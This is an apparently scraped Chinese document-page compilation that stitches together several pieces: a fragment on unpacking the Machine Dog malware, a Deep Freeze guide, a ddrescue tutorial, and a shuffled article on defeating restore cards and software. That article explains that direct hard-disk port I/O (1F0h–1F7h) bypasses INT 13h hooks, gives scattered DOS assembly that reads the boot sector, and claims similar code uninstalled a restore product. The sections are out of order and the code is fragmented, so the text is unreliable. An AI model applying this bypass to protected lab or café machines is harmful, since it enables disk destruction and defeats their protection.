08机器狗变种一:注入"explorer.exe"进程 Explorer.exe机器狗-分析(逆向工程) 文章末尾所添加的机器狗、IGM、写穿还原的工具 样本脱壳 OD加载样本explorer.exe, 对GetModuleHandleA下断,参数为NULL时即为入口点处对此函数的调用, 退出CALL之后可以得到入口为 004016ED。 重新加载样本,对004016ED下内存写入断点,中断后StepOver一步,然后在004016ED 下断点,F9运行到入口,DUMP。DUMP之后不关闭OD,让样本处于挂起状态,使用ImportREC修复DUMP 出来的文件的导入表。 修复之后DUMP出来的文件用OD加载出错,使用PEDITOR的rebuilder功能重建PE之后即可用OD加载,说明
Deep Freeze6.3 企业版安装使用教程
试读版,未完待续更多精彩就在丫美DDeep Freeze6.3 企业版安装使用教程来源:丫美D一、Deep Freeze介绍1.Deep Freeze是什么?Deep Freeze是由Faronics公司出品的一款类似于还原精灵的系统还原软件,它可自动将系统还原到初始状态,保护你的系统不被更改,能够很好的抵御病毒的入侵以及人为的对系统有意或无意的破坏,不管个人用户还是网吧、学校或企业,都能起到简化系统维护的作用,使维护工作简单化、方便化。
是网吧、机房、公司等维护人员帮手。
安装了Deep Freeze的系统,无论进行了安装文件还是删除文件、更改系统设置等操作,计算机从新启动后,一切将恢复成初始状态,对学校机房、网吧等好处是不言而喻的。
对于还原精灵网上公布了很多的破解方法,还有专门的破解程序,对于蓄意破坏系统的人是无法阻止的,因此使用还原精灵的系统上网不太安全,加之有些病毒专门破坏还原精灵,使其失效而失去保护作用。
对于Deep Freeze(冰点还原),目前还没有破解的办法,因此,一旦弄丢了管理密码,只能格式化磁盘重新安装系统了。
安装Deep Freeze的好处所有更改都是临时的!例如:▲安装新软件▲卸载软件▲上网记录、聊天记录▲Windows的平常使用记录(包括:常用软件使用的痕迹等)▲删除文件夹、文件及其他任何东西▲强行关机或复位重启(开机不会出现扫描程序)▲病毒感染▲更改桌面及背景▲更改注册表▲格式化硬盘▲各种粗暴的破坏等操作以上操作开机重启后一切将还原成初始状态!2.Deep Freeze的版本Deep Freeze可分为以下几个版本:服务器企业版:适用于Windows2000/2003操作系统(主要用于服务器版操作系统)服务器标准版(单机版): 适用于Windows2000/2003操作系统(主要也是服务器版)企业版: 适用于Windows 95/98/Me/2000/XP/Vista操作系统标准版(单机版):适用于Windows 95/98/Me/2000/XP/Vista操作系统还有Liunx版、 Mac(苹果版)。
利用ddrescue命令进行数据恢复
利用ddrescue命令进行数据恢复数据恢复是指通过某种方法将无法访问或丢失的数据重新获取的过程。
在计算机领域,意外数据丢失是一个常见的问题,可能由于硬盘故障、误删除、病毒攻击等原因导致数据的损坏或丢失。
为了解决这个问题,工程师们开发了各种数据恢复工具和技术。
其中一种常见的工具是ddrescue命令。
I. ddrescue命令简介ddrescue是一个用于数据恢复的开源命令行工具。
它可以在硬盘故障的情况下复制数据,并且与其他备份工具相比,它具有更强大和灵活的功能。
ddrescue通过多次尝试恢复错误的扇区,并在后续尝试中跳过错误的扇区,从而以最小的干扰恢复尽可能多的数据。
II. 安装和基本用法1. 安装ddrescue命令要安装ddrescue命令,你可以使用以下命令:```sudo apt-get install gddrescue```这将在你的系统上安装ddrescue命令。
2. 使用ddrescue命令进行数据恢复使用ddrescue命令进行数据恢复有两个关键步骤:复制和恢复。
下面是使用ddrescue命令进行数据恢复的基本用法示例:```ddrescue 源文件目标文件```其中,源文件是指需要恢复数据的文件路径,目标文件是要保存恢复数据的文件路径。
III. 高级用法1. 使用日志文件ddrescue支持使用日志文件来记录已经处理过的扇区。
这种方式可以使你在恢复过程中暂停和继续,而不会重复处理之前已经处理过的扇区。
使用日志文件的命令如下:```ddrescue 源文件目标文件日志文件```其中,日志文件是一个指定路径的文件,用于记录处理过的扇区信息。
2. 限制重试次数如果你希望在恢复过程中限制重试次数,可以使用以下命令:```ddrescue -r 3 源文件目标文件```这将限制尝试恢复错误扇区的次数为3次。
3. 跳过错误的扇区通过指定跳过选项,你可以让ddrescue命令在处理错误扇区时直接跳过,从而提高恢复效率。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
为32h 尝试写长扇区
为33h 无须验证扇区是否准备好而直接写长扇区
注:当然看完这个表你会发现,这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写方法,不过大于8G的硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^
四、一个通过对硬盘输入输出端口操作来读写硬盘的实例
int 21h
good_exit: ;以下部分用来结束程序
mov ax,4c00h ;退出程序
int 21h
readmsg db 'The buffers match. Hard disk read using ports.$'
failmsg db 'The buffers do not match.$'
谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我写的用来测试破解还原精灵的代码,本代码编译后的程序需要在纯DOS环境执行,在DOS下我用这段代码成功的把还原精灵给卸载了。
.286
CODE SEGMENT
ASSUME CS:CODE,DS:code,ES:code
1F3H 读/写 用来放入要读写的扇区号码
1F4H 读/写 用来存放读写柱面的低8位字节
1F5H 读/写 用来存放读写柱面的高2位字节(其高6位恒为0)
1F6H 读/写 用来存放要读/写的磁盘号及磁头号
第7位 恒为1
第6位 恒为0
第5位 恒为1
第4位 为0代表第一块硬盘、为1代表第二块硬盘
好了,你已经看出来了,这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键,那么这段代码到底实现了些什么了,以下是本人对此拙浅的理解:
1.拦截所有INT13H中对硬盘0头0道1扇的操作
这些包括读写操作,把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作,这样做的目的是保护虚拟还原代码不被破坏,并且不能被有心人读出进行破解,即使你用扇区编辑工具查看主引导区,实际上你看到的是这个备份的主引导区。
mov si,offset buffer
mov di,offset buffer2
repe cmpsb
jne failure
mov ah,9
mov dx,offset readmsg
int 21h
jmp good_exit
failure:
mov ah,9
mov dx,offset failmsg
在此强调我不赞成制造病毒,但一个病毒制造者完全可以用此原理写出一个可以实现破坏装有还原卡或还原软件的机器了,所以我要提醒虚拟还原用户的是,不要以为装有还原卡或是还原软件就掉以轻心,要知道世界上还是有病毒能够穿透虚拟还原技术的保护,达到破坏硬盘的目的的,想象一下如果把这一原理运用到CIH病毒中,或者运用到硬盘杀手病毒中,其后果是不堪设想的。
2.拦截所有INT13H中的写硬盘操作
这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作,和扩展INT13H中基于扇区地址方式的对大硬盘的写操作,甚至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做”,也就是说当用户写硬盘时实际上是什么都没做,但现在的操作系统都要对硬盘进行一些必要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是硬盘,而如果禁止操作系统写硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些硬盘空间,把硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学记录硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和硬盘空间的占用量上的,也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键,如果有这方面想法的朋友欢迎和我交流;
让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到的端口,并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据进行比较,从而证实这两种操作功能相同,程序片段如下:
mov dx,1f6h ; 要读入的磁盘号及磁头号
mov al,0a0h ;磁盘0,磁头0
第3~0位 用来存放要读/写的磁头号
1f7H 读 用来存放读操作后的状态
第7位 控制器忙碌
第6位 磁盘驱动器准备好了
第5位 写入错误
第4位 搜索完成
第3位 为1时扇区缓冲区没有准备好
第2位 是否正确读取磁盘数据
第1位 磁盘每转一周将此位设为1,
第0位 之前的命令因发生错误而结束
写 该位端口为命令端口,用来发出指定命令
为50h 格式化磁道
为20h 尝试读取扇区
为21h 无须验证扇区是否准备好而直接读扇区
为22h 尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字节到1024之间的值)
为23h 无须验证扇区是否准备好而直接读长扇区
为30h 尝试写扇区
三、硬盘读写端口的具体含义
对硬盘进行操作的常用端口是1f0h~1f7h号端口,各端口含义如下:
端口号 读还是写 具体含义
1F0H 读/写 用来传送读/写的数据(其内容是正在传输的一个字节的数据)
1F1H 读 用来读取错误码
1F2H 读/写 用来放入要读写的扇区数量
buffer db 512 dup ('V')
buffer2 db 512 dup ('L')
五、可以穿透还原卡或是还原软件保护的代码
你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较深的理解。好了,到了该把谜底揭晓的时候了,重新回到我们的主题。正如你现在想象的,这种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在,我们已经可以从原理上理解了,还原卡拦截的是中断操作,但却拦截不了输入输出操作,而用输入输出操作足够可以对硬盘进行写操作了,当然用输入输出操作也完全可以读到被虚拟还原程序屏蔽的关键部分,被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后,可能是仁者见仁智者见智的,如果你是一个虚拟还原技术的破解者、一个病毒制造者,或是虚拟还原技术的设计者,往往对此的理解都是不尽相同的。
一种可以穿透还原卡和还原软件的代码
还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道真的没有一种方法能够穿透这种保护机制么?答案是否定的,下面请听我一一道来。
为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断,INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不对,但的确中断为我们“封装”了许多系统底层的细节。
START:
3.备份端口70H,71H中的内容,并把最后一次执行时端口70H,71H的内容和备份的内容做比较,不一样就提示BIOS被修改,是否还原,并通过密码验证修改BIOS是否合法。
二、PC机的中断机制
中断提供了最基本的硬件和软件的接口,它使得程序员不必了解硬件系统的细节,只要直接调用系统提供的中断服务子程序,就可以完成相应功能,这样能使得程序设计更为方便。其实现机制如下:当某一中断源发出中断请求时,CPU能够决定是否响应这一中断请求(当CPU在执行更为重要的工作时,可以暂不响应),如果允许响应该中断,CPU会在现行的指令执行完后,把断点处的下一条指令地址和各寄存器的内容和标志位的状态,推入堆栈进行保护,然后转到中断源服务程序的入口,进行中断处理,当中断处理完成后,再恢复被保留的各寄存器、标志位状态和指令指针,使CPU返回断点,继续执行下一条指令。
1.将中断向量表中的INT13H的入口地址保存;
2.把自己用于代替INT13H的代码写入内存,并记住入口地址,当然这种“写入内存”并不是普通的“写”,而是一种我们称为“常驻”的方法,有关“常驻程序”的实现方法我们不另外花篇幅来描述了,如果你还不了解的话请自己找有关资料,也可以到或找风般的男人交流;
out dx,al
mov dx,1f2h ;要读入的扇区数量
mov al,1 ;读一个扇区
out dx,al
mov dx,1f3h ;要读的扇区号
mov al,1 ;扇区号为1
out dx,al
mov dx,1f4h ;要读的柱面的低8位
mov al,0 ; 柱面低8位为0
一、虚拟还原技术或还原软件上的技术,当然,不同品牌不同厂商生产的可能不尽相同,但原理却是相通的。